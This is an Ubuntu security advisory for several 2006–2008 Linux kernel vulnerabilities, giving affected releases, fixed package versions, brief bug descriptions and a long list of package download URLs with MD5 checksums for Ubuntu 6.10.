CVE-2007-6206, CVE-2007-6417, CVE-2008-0001 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.10: linux-image-2.6.17-12-386 2.6.17.1-12.43 linux-image-2.6.17-12-generic 2.6.17.1-12.43 linux-image-2.6.17-12-hppa32 2.6.17.1-12.43 linux-image-2.6.17-12-hppa64 2.6.17.1-12.43 linux-image-2.6.17-12-itanium 2.6.17.1-12.43 linux-image-2.6.17-12-mckinley 2.6.17.1-12.43 linux-image-2.6.17-12-powerpc 2.6.17.1-12.43 linux-image-2.6.17-12-powerpc-smp 2.6.17.1-12.43 linux-image-2.6.17-12-powerpc64-smp 2.6.17.1-12.43 linux-image-2.6.17-12-server 2.6.17.1-12.43 linux-image-2.6.17-12-server-bigiron 2.6.17.1-12.43 linux-image-2.6.17-12-sparc64 2.6.17.1-12.43 linux-image-2.6.17-12-sparc64-smp 2.6.17.1-12.43 Ubuntu 7.04: linux-image-2.6.20-16-386 2.6.20-16.34 linux-image-2.6.20-16-generic 2.6.20-16.34 linux-image-2.6.20-16-hppa32 2.6.20-16.34 linux-image-2.6.20-16-hppa64 2.6.20-16.34 linux-image-2.6.20-16-itanium 2.6.20-16.34 linux-image-2.6.20-16-lowlatency 2.6.20-16.34 linux-image-2.6.20-16-mckinley 2.6.20-16.34 linux-image-2.6.20-16-powerpc 2.6.20-16.34 linux-image-2.6.20-16-powerpc-smp 2.6.20-16.34 linux-image-2.6.20-16-powerpc64-smp 2.6.20-16.34 linux-image-2.6.20-16-server 2.6.20-16.34 linux-image-2.6.20-16-server-bigiron 2.6.20-16.34 linux-image-2.6.20-16-sparc64 2.6.20-16.34 linux-image-2.6.20-16-sparc64-smp 2.6.20-16.34 Ubuntu 7.10: linux-image-2.6.22-14-386 2.6.22-14.51 linux-image-2.6.22-14-cell 2.6.22-14.51 linux-image-2.6.22-14-generic 2.6.22-14.51 linux-image-2.6.22-14-hppa32 2.6.22-14.51 linux-image-2.6.22-14-hppa64 2.6.22-14.51 linux-image-2.6.22-14-itanium 2.6.22-14.51 linux-image-2.6.22-14-lpia 2.6.22-14.51 linux-image-2.6.22-14-lpiacompat 2.6.22-14.51 linux-image-2.6.22-14-mckinley 2.6.22-14.51 linux-image-2.6.22-14-powerpc 2.6.22-14.51 linux-image-2.6.22-14-powerpc-smp 2.6.22-14.51 linux-image-2.6.22-14-powerpc64-smp 2.6.22-14.51 linux-image-2.6.22-14-rt 2.6.22-14.51 linux-image-2.6.22-14-server 2.6.22-14.51 linux-image-2.6.22-14-sparc64 2.6.22-14.51 linux-image-2.6.22-14-sparc64-smp 2.6.22-14.51 linux-image-2.6.22-14-ume 2.6.22-14.51 linux-image-2.6.22-14-virtual 2.6.22-14.51 linux-image-2.6.22-14-xen 2.6.22-14.51 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: The minix filesystem did not properly validate certain filesystem values. If a local attacker could trick the system into attempting to mount a corrupted minix filesystem, the kernel could be made to hang for long periods of time, resulting in a denial of service. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2006-6058) The signal handling on PowerPC systems using HTX allowed local users to cause a denial of service via floating point corruption. This was only vulnerable in Ubuntu 6.10 and 7.04. (CVE-2007-3107) The Linux kernel did not properly validate the hop-by-hop IPv6 extended header. Remote attackers could send a crafted IPv6 packet and cause a denial of service via kernel panic. This was only vulnerable in Ubuntu 7.04. (CVE-2007-4567) The JFFS2 filesystem with ACL support enabled did not properly store permissions during inode creation and ACL setting. Local users could possibly access restricted files after a remount. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-4849) Chris Evans discovered an issue with certain drivers that use the ieee80211_rx function. Remote attackers could send a crafted 802.11 frame and cause a denial of service via crash. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-4997) Alex Smith discovered an issue with the pwc driver for certain webcam devices. A local user with physical access to the system could remove the device while a userspace application had it open and cause the USB subsystem to block. This was only vulnerable in Ubuntu 7.04. (CVE-2007-5093) Scott James Remnant discovered a coding error in ptrace. Local users could exploit this and cause the kernel to enter an infinite loop. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-5500) It was discovered that the Linux kernel could dereference a NULL pointer when processing certain IPv4 TCP packets. A remote attacker could send a crafted TCP ACK response and cause a denial of service via crash. This was only vulnerable in Ubuntu 7.10. (CVE-2007-5501) Warren Togami discovered that the hrtimer subsystem did not properly check for large relative timeouts. A local user could exploit this and cause a denial of service via soft lockup. (CVE-2007-5966) Venustech AD-LAB discovered a buffer overflow in the isdn net subsystem. This issue is exploitable by local users via crafted input to the isdn_ioctl function. (CVE-2007-6063) It was discovered that the isdn subsystem did not properly check for NULL termination when performing ioctl handling. A local user could exploit this to cause a denial of service. (CVE-2007-6151) Blake Frantz discovered that when a root process overwrote an existing core file, the resulting core file retained the previous core file's ownership. Local users could exploit this to gain access to sensitive information. (CVE-2007-6206) Hugh Dickins discovered the when using the tmpfs filesystem, under rare circumstances, a kernel page may be improperly cleared. A local user may be able to exploit this and read sensitive kernel data or cause a denial of service via crash. (CVE-2007-6417) Bill Roman discovered that the VFS subsystem did not properly check access modes. A local user may be able to gain removal privileges on directories. (CVE-2008-0001) Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.diff.gz Size/MD5: 2088629 e6f2abefc3d6b741165ad85e3e12e1cc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.dsc Size/MD5: 2324 dba618e1ef3933ef7b72f9ae0c2f2a04 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.43_all.deb Size/MD5: 4507566 f3593f4794ecb3c76651d3ee5fa80765 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.43_all.deb Size/MD5: 1098296 620681fa48911c868638eb45a081ef19 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43_all.deb Size/MD5: 46084550 a000ec6ae14a1430b19961088773e415 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 28612 a364ed5ec4a61c86836d92df3e7d1671 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 50500 93635a5be96568a0bcc013b0f9374828 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 2446 7c308d57a11c0852c5c191b32db03543 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 40788 203ccc34e8d6ef08fefdb297f43660b7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 113552 a08770e0ab9c5a095b3bbeb9aaa494b2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 43992 045de726c19efd85aec0c58e19a4e206 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 54024 58805876572a665f4ee930dd031fe271 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 189510 3baf972b680afac6017d498d3139a1c8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 40028 b7ba746a91d6ee3d22281d242ecb0cce http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 167744 276c9cae47fea158f010c9e9e4f04cc2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 60446 994cf3669c701f3e1336fdb0d80cac91 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 154562 2957b41258642e256d453a061cc3d219 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 314684 65a235b5a3258afe62924d8d962bbdf4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 105984 3b483a47da6b7b974619982ed1dd1b0c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 1904886 31043dbf63f7fff0a46a17b20969a62d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb Size/MD5: 908872 f4a952f077d42bd99dac73248521c6f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_amd64.deb Size/MD5: 913364 758d91637533ae5e080b637024f1681d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_amd64.deb Size/MD5: 7430792 b3c5bf05fab75da55cd6a29e874452f6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb Size/MD5: 23811514 fff7d351088cfc95d13afb9e240773d7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_amd64.deb Size/MD5: 24390532 b8889d70f1eaa4ec8dc9d7feda1f6dc0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb Size/MD5: 2341466 5d5c42e611287c5867da6f9fe9517de9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_amd64.deb Size/MD5: 2340116 a773aac3beb5aa0ef0630b95b321e88d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_amd64.deb Size/MD5: 1772018 a783af129fea695b41510174eb43d345 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 16788 34074cba4be650462232dca85e2104ea http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 279182 33e7fc01312168bfda6c2ed7e4847cc5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 256910 22dda36c134a86e4eab945493f568bd5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 1048488 572cc74c21331f50cd46468bbe42e7c1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 2103834 7867da5294924f2329268a010acf50ca http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 164438 2d6b9ba760717b711528b7f729ec0c1b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 10502 544a81e351b9d9c14e56e924a6179c21 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 93360 9d0dd71df54a14334a2d56df02dc70b5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 52564 79d82bd8c45bad6f92fb6711786ed307 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 39814 e9213be66eca3f6b6d073e1a14f1a306 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 79820 8115473b2953a78a0b451d3aaaebc793 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 6332 279d471ccb620dc327e808225c35de8e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 9370 92f7e30eb7bb55cfa08198e141becd14 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 62724 0bf2ba4988f7361accbe6fe7f0e7fb6a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 138620 ebca050307f87ac2d72ebd9bc689e7ca http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 115686 0531aaadc28eb1f9553f42d29e45cf7c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 90614 b51479c44a516e3b7b1d9d6501351732 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 1286186 7fd5738a9d02487f8205f7d4438df1c5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 80588 1eaebfa015089b95fb4b33e0e3d54831 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 13478 2fc4ef01ba125ff2c58541f680aea075 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 76274 2e8780a4c9f01d284f0f1721b9e6a80b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 36064 240b896de4d9d3b6e3e9078400f8a9f3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 151840 65707cf2f8925a5a89c2e13ddcbf0c04 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 53542 5de4ee3697a7e239fcafdd39c68d045a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb Size/MD5: 323448 02893e9d497b071b0379937a81316fbb i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 21210 90bb4a1eaf048397151cda845fe401f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 23814 164eeb1b9f128c5ee852efcd0bf6f09f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 43878 d9456b9d963455fdd95955e31c92fb0b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 44472 9ca39b7bf2e0c126e56bd46095a5726c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 104800 51595b0395fd381c41d93570df72dffd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 49412 5666f98c8991e30887c9677c81f7a76d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 2368 1cf01d58d7c70fa5dc5c1a3b7f796b0f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 2386 1bb0d2b50b6abcc517c8c1e591db1188 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 35304 880cdb09c2afcdf33ca40b9c13ddfc0b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 36730 dc104bd3c776255fc5738200b86ea3e5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 98282 a4a2536dface30a86fb49f2d1747c95d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 103506 08dc4f5c3ff60ba0bc9db2a92f249b4b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 38464 0288c1b2739b79f239c2c398d7703a86 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 39218 ba8b176b541052598a6c82a842aea87c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 44262 cff486146f47b112da60140687965946 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 44668 21193a742cddbd1c62ad0fa7d5720ed8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 172766 643ad8c80d7e3beb34f5d1da62d867d9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 175168 812aafb1b907e821f6d3c8d3f8d9b593 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 33752 f109ef9e5b987019de1e3cf0ec23bd5f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 34712 dbb5e40f1ac6b1b8ff50740f04808a04 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 140568 65b14145f46c5f5a4333231248f34bc0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 143824 cf95c4ede04a08b6c7889e08348af8bd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 51750 d58a3e4b7a2d9d0206cba67e5e3e3d35 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 53178 ba13e94b724e38b9716dde36594f3bf0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 131596 36f23a4d5b41b318b4699931d286e5c2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 139174 456392c847ef3b5e2a46b88361b49571 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 288332 01d4271ae5667e584bb797bb29fef703 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 290688 5118af753b583834e2c73607f511fdc7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 103544 baa598f64f024be463dee2c50a5f8e1b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 106708 a36aa0d353997b26fb31b9ead239fe78 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 1737910 e5f7666e862b98a399f5344fdfdc2ed1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 1803750 ee8687d07d5768fe7980155663d11132 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.43_i386.deb Size/MD5: 910860 0466ac4f169db0b306b323ebb55fd8bb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_i386.deb Size/MD5: 914056 56b0539e10fcfe31da8ae9fa4d9e7975 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb Size/MD5: 911722 6cceb0b5dfd5ac6b9104cb3e513e2556 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_i386.deb Size/MD5: 919298 178db23c4a81c28891cdbc86d37d1b95 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_i386.deb Size/MD5: 7426150 d216c4ffcdeea0810aee0790f629da75 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.43_i386.deb Size/MD5: 22802810 31c622390efeb404063898f4491bbe0f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_i386.deb Size/MD5: 22935968 12f638d7c23cccfec9752ade307be1f2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb Size/MD5: 23746230 601e62d57735ba78526b4079d914a2d2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_i386.deb Size/MD5: 23246944 0ef40430dd5d01c2aa4698af31c57bae http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.43_i386.deb Size/MD5: 1962604 1175ac7b4ba79b7f305a1a74d931d5f6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_i386.deb Size/MD5: 2030506 2e920daca195cf289122fb8f41750737 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb Size/MD5: 2068164 f7978d05bfff5a44bdaa945784111614 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_i386.deb Size/MD5: 2030120 7e20aee45239a29d630b21db08b20887 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_i386.deb Size/MD5: 1772080 063d4574c54b2106c50fe2aa85e73ea9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 15368 96f76d56e018b60b3eaf0f698bf53b0b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 15732 8a28056b915141194af890edf2a857cd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 253320 62259e21984827827bb237207a3c434c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 263866 e515dace37d353b855decb1894c03526 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 220356 d82fbe1807f427957d2240e4d6ee2de2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 227606 9841f92234aeb38595f1293b494568e8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 1048396 efe5e40a4ae6796607860e5d840a5a47 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 1048474 d563de8e4950bc06a27fab7459ad3d13 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 2092330 71269925380b7a53f571a792902e40e7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 2142966 244c5b370c5702454a45fb98e291b893 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 156878 34e962d29e772315d6a8bec7bd8125a9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 152162 207cf979445881979febccef8f8c8f16 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 9180 653053c650343a44e34729fe57917e22 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb Size/MD5: 9648 4e38d07f2067367b9ac6e61ddba3cf1c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb Size/MD5: 79222 7388ad369b101a9dae3bd539a754d4c8 